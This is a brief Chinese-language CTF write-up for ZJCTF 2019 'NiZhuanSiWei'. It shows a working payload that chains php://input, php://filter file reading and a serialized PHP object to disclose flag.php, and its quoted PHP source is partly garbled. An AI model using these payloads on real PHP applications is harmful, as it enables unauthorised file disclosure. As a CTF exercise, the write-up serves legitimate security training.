# \[ZJCTF 2019]NiZhuanSiWei ## \[ZJCTF 2019]NiZhuanSiWei ## 考点 * 用php\://input绕过file\_get\_contents的内容限制 * 文件包含配合伪协议读取文件 * PHP反序列化 ## wp ![](https://982381760-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKaFsBybpMwWG2gp4TiAi%2Fuploads%2FSxBxHaeU0GhI3BYGeG4B%2FmjjndGScRFxy6RNpIYI8nl97RgL_GzpPXU6iWIDcg90.png?alt=media\&token=faa0728d-125c-448c-8d61-fb644bb8b3ff) 用`php://input`绕过`file_get_contents($text,'r')`的限制用`php://filter/read=convert.base64-encode/resource=useless.php`读取文件 ```php file)){ echo file_get_contents($this->file); echo "
"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?> ``` 然后反序列化 ```php class Flag{ public $file="flag.php"; } $a = new Flag(); echo serialize($a); ``` payload: ``` ?text=php://input&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} welcome to the zjctf ```